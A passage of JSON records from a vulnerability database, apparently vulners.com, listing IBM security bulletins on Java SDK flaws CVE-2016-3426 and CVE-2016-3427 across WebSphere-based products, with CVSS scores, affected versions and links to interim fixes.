"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T15:23:23", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427) shipped with Tivoli Netcool Performance Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T15:23:23", "id": "84CC191C6FF7D7F095AAC167AD676E34BADFF5788D009121FE195F8179866081", "href": "https://www.ibm.com/support/pages/node/279315", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:51:51", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition, Version 6 \nthat is used by IBM Initiate Master Data Service. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nThese vulnerabilities are known to affect the following offerings: \n \nIBM Initiate Master Data Service versions 9.5, 9.7, 10.0, 10.1 (impacts _Master Data Engine_ component, [_Message Brokers_](<http://pic.dhe.ibm.com/infocenter/mdm/v11r0/topic/com.ibm.mdshs.hubover.doc/topics/c_hubover_message_broker_suite.html>) component and _Workbench_ component)\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the fix as soon as practical. Please see below for information on the fixes available. \n\n**_Product_**| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \nIBM Initiate Master Data Service | \n\n9.5\n\n| None| [_9.5.052516_IM_Initiate_MasterDataService_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=All&platform=All&function=fixId&fixids=9.5.052516_IM_Initiate_MasterDataService_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Patient| \n\n9.5\n\n| None| [_9.5.052516_IM_Initiate_Patient_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Patient&release=All&platform=All&function=fixId&fixids=9.5.052516_IM_Initiate_Patient_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Provider| \n\n9.5\n\n| None| [_9.5.052516_IM_Initiate_Provider_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Provider&release=All&platform=All&function=fixId&fixids=9.5.052516_IM_Initiate_Provider_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Master Data Service | \n\n9.7\n\n| None| [_9.7.052516_IM_Initiate_MasterDataService_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=All&platform=All&function=fixId&fixids=9.7.052516_IM_Initiate_MasterDataService_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Patient| \n\n9.7\n\n| None| [_9.7.052516_IM_Initiate_Patient_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Patient&release=All&platform=All&function=fixId&fixids=9.7.052516_IM_Initiate_Patient_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Provider| \n\n9.7\n\n| None| [_9.7.052516_IM_Initiate_Provider_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Provider&release=All&platform=All&function=fixId&fixids=9.7.052516_IM_Initiate_Provider_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Master Data Service| \n\n10.0\n\n| None| [_10.0.052516_IM_Initiate_MasterDataService_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=All&platform=All&function=fixId&fixids=10.0.052516_IM_Initiate_MasterDataService_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Patient| \n\n10.0\n\n| None| [_10.0.052516_IM_Initiate_Patient_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Patient&release=All&platform=All&function=fixId&fixids=10.0.052516_IM_Initiate_Patient_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Provider| \n\n10.0\n\n| None| [_10.0.052516_IM_Initiate_Provider_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Provider&release=All&platform=All&function=fixId&fixids=10.0.052516_IM_Initiate_Provider_ALL_InterimFix&includeSupersedes=0&source=fc>) \nIBM Initiate Master Data Service| \n\n10.1\n\n| None| [_10.1.052516_IM_Initiate_MasterDataService_ALL_InterimFix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=All&platform=All&function=fixId&fixids=10.1.052516_IM_Initiate_MasterDataService_ALL_InterimFix&includeSupersedes=0&source=fc>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T14:01:57", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Initiate Master Data Service (CVE-2016-3426, CVE- 2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T14:01:57", "id": "F35F5FE0DA298C18416599A44F6A3AC496F0F4FEC9098F354459A1FB95F4A01E", "href": "https://www.ibm.com/support/pages/node/279735", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:05", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Records Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Records Manager 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \nIBM Records Manager 8.5.0.6| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \nIBM Records Manager 8.5.0.7| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:16:04", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Records Manager (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:16:04", "id": "3C13E1626546AB19B54BC13C855DB4A4A72EDBD9013028CD74215F23DDA82984", "href": "https://www.ibm.com/support/pages/node/282275", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:10", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Content Manager Records Enabler. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Security Vulnerability in IBM WebSphere Application Server (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \n \nIBM Content Manager Records Enabler 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \n \nIBM Content Manager Records Enabler 8.5.0.6 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \n \nIBM Content Manager Records Enabler 8.5.0.7 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:15:34", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Content Manager Records Enabler (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:15:34", "id": "300B30B77E64A29C8B399F8C62E9F501F6C76F9367F47CB2AECB5124ADBB7048", "href": "https://www.ibm.com/support/pages/node/278711", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:17", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Enterprise Service Bus. Information about the security vulnerabilities affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n \nPlease consult the security bulletin [Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nWebSphere Enterprise Service Bus v7.0 and v 7.5\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:34", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere \nApplication Server shipped with WebSphere Enterprise Service Bus (CVE-2016-3427, CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:34", "id": "B4C8559B2D36E25ABE9FBA0A4F587138E22094E71DD07485714AE1D179A84333", "href": "https://www.ibm.com/support/pages/node/278313", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:40:10", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Rational ClearQuest. Information about a security vulnerability affecting WAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the bulletin \"[Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21982223>)\" for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIBM Rational ClearQuest, CQ Web Server, FTS Server, report launcher component. \n\n**Versions 8.0.0.x, 8.0.1.x, 9.0.0.x**\n\n**Versions 7.1.x.x**\n\n## Remediation/Fixes\n\nReview the security bulletin referenced above and apply the relevant fixes to your WAS installation used for ClearQuest. \n \n\n\n**Affected Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n7.1.0.x, 7.1.1.x, and 7.1.2.x| [Document 1390803](<http://www.ibm.com/support/docview.wss?uid=swg21390803>) explains how to update WebSphere Application Server for ClearQuest CM Servers at release 7.1.x. Consult those instructions when applying the fix. \n8.0.0.x \n8.0.1.x \n9.0.0.x| Apply the appropriate WebSphere Application Server fix directly to your ClearQuest server host. No ClearQuest-specific steps are necessary. \n_For 7.0.x, 7.1.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-29T18:04:03", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server (WAS) shipped with IBM Rational ClearQuest (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-09-29T18:04:03", "id": "391849D137C8AE4FB53B4FC5E1B3F8D0BCDD416F030E276A01FE226C2BE1B6BA", "href": "https://www.ibm.com/support/pages/node/279685", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:15", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Versions 6 and 7 that are used by WebSphere DataPower XC10 Appliance. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nWebSphere DataPower XC10 Appliance Version 2.1 \nWebSphere DataPower XC10 Appliance Version 2.5\n\n## Remediation/Fixes\n\nApply an interim fix, according to the table below.** **Interim fixes are associated with the original APAR that is documented in the table. Because these APAR references might be updated to more recent APARs, see the links in the table for the most recent interim fix information. \n \nThis interim fix contains a new default SSL certificate, as the previous default SSL certificate, which was never intended for production use, has an MD5 signature and is no longer compatible with Java. For deployments that have not installed XC10 interim fixes since February 26, 2016, the following applies: installing this interim fix will make it incompatible with any WebSphere Datapower XC10 appliances that are running with an MD5 certificate, including the default SSL certificate that was shipped prior to this interim fix. If the appliance is configured with a custom keystore and certificate with an MD5 signature, it must be replaced prior to upgrading to this interim fix or the 'clear-tls-config' command must be run on the appliance before or after performing the upgrade. Failing to do so will result in the appliance failing to start. Note that changing the active certificate for an appliance collective does require that the cache be reloaded and client truststores must be configured to trust the new certificate. \n \n\n\n_Product_| _Version_| _APAR_| _Link to interim fix_ \n---|---|---|--- \nWebSphere DataPower XC10 Appliance V2.1 on appliance 9235-92X| 2.1| IT15175| Refer to the **Version 2.1** table in[ Recommended fixes for WebSphere DataPower XC10 Appliance](<http://www-01.ibm.com/support/docview.wss?uid=swg27019704>). \nWebSphere DataPower XC10 Appliance V2.1 on appliance 7199-92X| 2.1| IT15175| Refer to the** Version 2.1** table in [Recommended fixes for WebSphere DataPower XC10 Appliance](<http://www-01.ibm.com/support/docview.wss?uid=swg27019704>). \nWebSphere DataPower XC10 Appliance V2.5 on appliance 7199-92X \n| Version 2.5 with SSD drivers ** \nImportant**: See [More Information](<http://www-01.ibm.com/support/docview.wss?uid=swg21682625>) link and follow instructions to determine if you have an old or newer SSD driver on your appliance using the show ssd-version command.| IT15175| Refer to the **Version 2.5** table in [Recommended fixes for WebSphere DataPower XC10 Appliance](<http://www-01.ibm.com/support/docview.wss?uid=swg27019704>). \nWebSphere DataPower XC10 Appliance V2.5 virtual image| 2.5| IT15175| Refer to the** Version 2.5** table in [Recommended fixes for WebSphere DataPower XC10 Appliance](<http://www-01.ibm.com/support/docview.wss?uid=swg27019704>). \n \n## Workarounds and Mitigations\n\nThere is no workaround. The interim fix must be applied to correct the problem.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:37", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere DataPower XC10 Appliance (CVE-2016-3427, CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:37", "id": "C6A6ABECADB0A1B202F572A8F947AF9F8E55FD674DB366EDEFD2EC2DD4BCE5B7", "href": "https://www.ibm.com/support/pages/node/278779", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:50:35", "description": "## Summary\n\nThere is a vulnerability in current releases of the IBM\u00ae SDK, Java\u2122 Technology Edition that affects IBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway. This issue was disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Tivoli Federated Identity Manager 6.2 \nIBM Tivoli Federated Identity Manager Business Gateway 6.2| IBM WebSphere Application Server 6.1 \nIBM Tivoli Federated Identity Manager 6.2.1 \nIBM Tivoli Federated Identity Manager Business Gateway 6.2.1| IBM WebSphere Application Server 6.1, 7.0 \nIBM Tivoli Federated Identity Manager 6.2.2 \nIBM Tivoli Federated Identity Manager Business Gateway 6.2.2| IBM WebSphere Application Server 6.1, 7.0, 8.0, 8.5 \n \n## Remediation/Fixes\n\nIBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway is affected through IBM WebSphere Application Server. If you use one of the affected versions of WebSphere, update your IBM WebSphere Application Server SDK with the appropriate Interim Fix based on information in the WebSphere security bulletin [**Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>).\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T21:41:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in IBM Java SDK affects IBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T21:41:50", "id": "0A188938BB57625255598B9B581375E3C99A86BB3F15E48ED8315B0895EAF89D", "href": "https://www.ibm.com/support/pages/node/278527", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:05", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Records Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Records Manager 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \nIBM Records Manager 8.5.0.6| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \nIBM Records Manager 8.5.0.7| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 